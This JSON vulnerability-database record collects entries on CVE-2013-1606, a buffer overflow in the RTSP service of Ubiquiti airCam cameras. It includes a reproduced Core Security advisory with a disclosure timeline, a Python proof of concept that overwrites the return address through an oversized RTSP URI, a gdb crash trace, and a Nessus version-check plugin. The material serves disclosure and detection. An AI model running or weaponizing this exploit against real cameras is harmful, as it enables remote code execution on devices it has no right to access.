2013-05-29:\nCore asks if a beta firmware is available for downloading.\n\n. 2013-05-29:\nVendor notifies that they have a v1.1.6 build of the firmware which is\nbeing tested internally and will be released very soon, probably this\nweek. However, it is not yet available on the ubnt.com/download site.\n\n. 2013-05-29:\nFirst release date missed.\n\n. 2013-06-03:\nCore asks for a status update.\n\n. 2013-06-03:\nVendor notifies that they do not have a specific release date yet.\n\n. 2013-06-11:\nVendor notifies that they released firmware 1.2.0 along with airVision 2\n[2][3], and a public announcement will be made soon. Release of firmware\n1.1.6 (for the airVision 1.x platform) has to be defined.\n\n. 2013-06-11:\nAdvisory CORE-2013-0430 published.\n\n\n10. *References*\n\n[1] http://www.ubnt.com.\n[2] Ubiquiti downloads http://www.ubnt.com/download#AirCam.\n[3] Ubiquiti firmware v1.2.0\nhttp://www.ubnt.com/downloads/AirCam-v1.2.0.build17961.bin.\n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography.\nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies.\nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com.\n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations.\n\nCore Security's software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company's Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com.\n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2013 Core Security\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T16:05:56", "description": "Core Security - Corelabs Advisory\r\nhttp://corelabs.coresecurity.com\r\n \r\nBuffer overflow in Ubiquiti airCam RTSP service\r\n \r\n \r\n1. *Advisory Information*\r\n \r\nTitle: Buffer overflow in Ubiquiti airCam RTSP service\r\nAdvisory ID: CORE-2013-0430\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/buffer-overflow-ubiquiti-aircam-rtsp-service\r\nDate published: 2013-06-11\r\nDate of last update: 2013-06-11\r\nVendors contacted: Ubiquiti\r\nRelease mode: Coordinated release\r\n \r\n \r\n2. *Vulnerability Information*\r\n \r\nClass: Classic buffer overflow [CWE-120]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2013-1606\r\n \r\n \r\n3. *Vulnerability Description*\r\n \r\nThe Ubiquiti [1] airCam RTSP service 'ubnt-streamer', has a buffer\r\noverflow when parsing the URI of a RTSP request message. This bug allows\r\nremote attackers to execute arbitrary code via RTSP request message.\r\n \r\n \r\n4. *Vulnerable Packages*\r\n \r\n . Cameras Models: airCam, airCam Mini, airCam Dome.\r\n . Firmware Version Verified: AirCam v1.1.5.\r\n . Other devices are probably affected too, but they were not checked.\r\n \r\n \r\n5. *Non-Vulnerable Packages*\r\n \r\n . firmware v1.2.0 (airVision 2.x platform).\r\n . firmware v1.1.6 (airVision 1.x platform).\r\n \r\n6. *Vendor Information, Solutions and Workarounds*\r\n \r\nPatched firmware versions can be downloaded from the Ubiquiti official\r\nwebsite [2], [3].\r\n \r\n \r\n7. *Credits*\r\n \r\nThese vulnerabilities were discovered and researched by Andres Blanco\r\nfrom Core Exploit Writers Team. The publication of this advisory was\r\ncoordinated by Fernando Miranda from Core Advisories Team.\r\n \r\n \r\n8. *Technical Description / Proof of Concept Code*\r\n \r\n \r\n\r\n```\r\n\r\n#\r\n# Author: Andres Blanco - CORE Security Technologies.\r\n#\r\n# The contents of this software are copyright (c) 2013 CORE Security and\r\n(c) 2013 CoreLabs,\r\n# and are licensed under a Creative Commons Attribution Non-Commercial\r\nShare-Alike 3.0 (United States)\r\n# License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n#\r\n# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED\r\n# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE\r\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR\r\n# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF\r\n# THIS SOFTWARE.\r\n#\r\n \r\nimport socket\r\n \r\nclass RtspRequest(object):\r\n \r\n def __init__(self, ip_address, port):\r\n self._ip_address = ip_address\r\n self._port = port\r\n \r\n def generate_request(self, method, uri, headers):\r\n data = \"\"\r\n data += \"%s %s RTSP/1.0\\r\\n\" % (method, uri)\r\n for item in headers:\r\n header = headers[item]\r\n data += \"%s: %s\\r\\n\" % (item, header)\r\n data += \"\\r\\n\"\r\n return data\r\n \r\n def send_request(self, data):\r\n sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sd.settimeout(15)\r\n sd.connect((self._ip_address, self._port))\r\n sd.send(data)\r\n resp = sd.recv(2048)\r\n sd.close()\r\n return resp\r\n \r\nif __name__ == \"__main__\":\r\n ip = \"192.168.100.1\"\r\n anRtsp = RtspRequest(ip, 554)\r\n data = \"\"\r\n data += \"A\" * 271\r\n data += \"\\x78\\x56\\x34\\x12\"\r\n uri = \"rtsp://%s/%s/live/ch00_0\" % (ip, data)\r\n headers = { \"CSeq\" : \"1\" }\r\n req = anRtsp.generate_request(\"DESCRIBE\", uri, headers)\r\n rsp = anRtsp.send_request(req)\r\n \r\n```\r\n \r\nBelow the gdb session when executing the PoC.\r\n \r\n```\r\n\r\nAirCam.v1.1.5# ./gdb --pid 358\r\n...\r\nAttaching to process 358\r\n \r\nwarning: process 358 is a cloned process\r\nReading symbols from /bin/ubnt-streamer...(no debugging symbols\r\nfound)...done.\r\nReading symbols from /lib/libpthread.so.0...(no debugging symbols\r\nfound)...done.\r\n...\r\n0x401c60a0 in select () from /lib/libc.so.6\r\n(gdb) c\r\nContinuing.\r\n \r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x12345678 in ?? ()\r\n(gdb) info registers\r\nr0 0x0 0\r\nr1 0x1 1\r\nr2 0xffffffff 4294967295\r\nr3 0x1 1\r\nr4 0x41414141 1094795585\r\nr5 0x41414141 1094795585\r\nr6 0x41414141 1094795585\r\nr7 0xd7198 881048\r\nr8 0x0 0\r\nr9 0x0 0\r\nr10 0xc6119 811289\r\nr11 0xc625f 811615\r\nr12 0x23 35\r\nsp 0x40a7eaf0 0x40a7eaf0\r\nlr 0x48d34 298292\r\npc 0x12345678 0x12345678\r\ncpsr 0x20000010 536870928\r\n(gdb) info stack\r\n#0 0x12345678 in ?? ()\r\n#1 0x00048d34 in ?? ()\r\n#2 0x00048d34 in ?? ()\r\nBacktrace stopped: previous frame identical to this frame (corrupt stack?)\r\n(gdb) x/50xw $sp-0x80\r\n0x40a7ea70: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7ea80: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7ea90: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7eaa0: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7eab0: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7eac0: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7ead0: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7eae0: 0x41414141 0x41414141 0x41414141 0x12345678\r\n0x40a7eaf0: 0x76696c2f 0x68632f65 0x305f3030 0x000d7100\r\n0x40a7eb00: 0x000c6060 0x000c6119 0x00059340 0x000491a8\r\n0x40a7eb10: 0x000d73f6 0x000c6267 0x00000001 0x000c6060\r\n0x40a7eb20: 0x000c6119 0x00059340 0x000c6118 0x00049780\r\n0x40a7eb30: 0x00000000 0x000c611c\r\n\r\n```\r\n \r\n \r\n9. *Report Timeline*\r\n \r\n. 2013-05-02:\r\nCore Security Technologies notifies the Ubiquiti team of the\r\nvulnerability. Publication date is set for May 29th, 2013.\r\n \r\n. 2013-05-02:\r\nVendor acknowledges the receipt of the email and asks for technical\r\ndetails.\r\n \r\n. 2013-05-02:\r\nA draft report with technical details and a PoC sent to Ubiquiti team.\r\n \r\n. 2013-05-03:\r\nVendor notifies that a new firmware version should address this\r\nvulnerability. It will be released shortly to the alpha and beta community.\r\n \r\n. 2013-05-06:\r\nCore notifies that the advisory will be re-scheduled to be released when\r\npatches are available to the alpha and beta community and asks for a\r\ntentative release date.\r\n \r\n. 2013-05-09:\r\nCore asks for a status update regarding this vulnerability and a\r\ntentative release date.\r\n \r\n. 2013-05-13:\r\nVendor notifies the firmware is still in internal testing and the\r\nrelease date will be confirmed in the following days.\r\n \r\n. 2013-05-27:\r\nCore notifies that there was no answer in the last 2 weeks regarding the\r\nrelease date. Core also notifies that the advisory was re-scheduled for\r\nJun 4th, and asks for a clear timeline to justify keep delaying the\r\nrelease.\r\n \r\n. 2013-05-28:\r\nVendor notifies that the new firmware is almost done and a confirmed\r\ndate will be notified in the following days.\r\n \r\n. 2013-05-29:\r\nCore asks if a beta firmware is available for downloading.\r\n \r\n. 2013-05-29:\r\nVendor notifies that they have a v1.1.6 build of the firmware which is\r\nbeing tested internally and will be released very soon, probably this\r\nweek. However, it is not yet available on the ubnt.com/download site.\r\n \r\n. 2013-05-29:\r\nFirst release date missed.\r\n \r\n. 2013-06-03:\r\nCore asks for a status update.\r\n \r\n. 2013-06-03:\r\nVendor notifies that they do not have a specific release date yet.\r\n \r\n. 2013-06-11:\r\nVendor notifies that they released firmware 1.2.0 along with airVision 2\r\n[2][3], and a public announcement will be made soon. Release of firmware\r\n1.1.6 (for the airVision 1.x platform) has to be defined.\r\n \r\n. 2013-06-11:\r\nAdvisory CORE-2013-0430 published.\r\n \r\n \r\n10. *References*\r\n \r\n[1] http://www.ubnt.com.\r\n[2] Ubiquiti downloads http://www.ubnt.com/download#AirCam.\r\n[3] Ubiquiti firmware v1.2.0\r\nhttp://www.ubnt.com/downloads/AirCam-v1.2.0.build17961.bin.\r\n \r\n \r\n11. *About CoreLabs*\r\n \r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n \r\n \r\n12. *About Core Security Technologies*\r\n \r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n \r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n \r\n \r\n13. *Disclaimer*\r\n \r\nThe contents of this advisory are copyright (c) 2013 Core Security\r\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n \r\n \r\n14. *PGP/GPG Keys*\r\n \r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.", "published": "2014-07-01T00:00:00", "title": "Ubiquiti airCam RTSP Service 1.1.5 - Buffer Overflow", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1606"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-79784", "id": "SSV:79784", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "nessus": [{"lastseen": "2021-01-01T06:34:01", "description": "According to its self-reported version number, the firmware installed\non the remote host is prior to 1.2.0. It is, therefore, affected by a\nremote code execution vulnerability in the 'ubnt-streamer' RTSP service\nwhen parsing an overly large URI of a RTSP request message. An attacker\ncan exploit this issue to cause a denial of service or execute arbitrary\ncode.", "edition": 25, "published": "2014-02-19T00:00:00", "title": "Ubiquiti airCam < 1.2.0 ubnt-streamer RTSP Service Remote Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1606"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:ubnt:airvision_firmware"], "id": "UBIQUITI_AIRCAM_1_2_0.NASL", "href": "https://www.tenable.com/plugins/nessus/72580", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72580);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\"CVE-2013-1606\");\n script_bugtraq_id(60487);\n script_xref(name:\"EDB-ID\", value:\"26138\");\n\n script_name(english:\"Ubiquiti airCam < 1.2.0 ubnt-streamer RTSP Service Remote Code Execution\");\n script_summary(english:\"Checks the Ubiquiti airCam firmware version number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the firmware installed\non the remote host is prior to 1.2.0. It is, therefore, affected by a\nremote code execution vulnerability in the 'ubnt-streamer' RTSP service\nwhen parsing an overly large URI of a RTSP request message. An attacker\ncan exploit this issue to cause a denial of service or execute arbitrary\ncode.\");\n # https://www.secureauth.com/labs/advisories/buffer-overflow-ubiquiti-aircam-rtsp-service\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a59c9d93\");\n # http://community.ubnt.com/t5/airVision-Blog/airVision-2-1-1-airCam-1-2-fw-Released/ba-p/486207\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b598e5bd\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to firmware version 1.2.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ubnt:airvision_firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ubiquiti_aircam_detect.nbin\");\n script_require_keys(\"Ubiquiti/airCam/Device\", \"Ubiquiti/airCam/Version\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nkb_base = \"Ubiquiti/airCam\";\n\nversion = get_kb_item_or_exit(kb_base+\"/Version\");\n\nfixed = '1.2.0';\nif (ver_compare(ver:version, fix:fixed, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed + '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse exit(0, \"The host is not affected since firmware version \" + version + \" is installed.\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}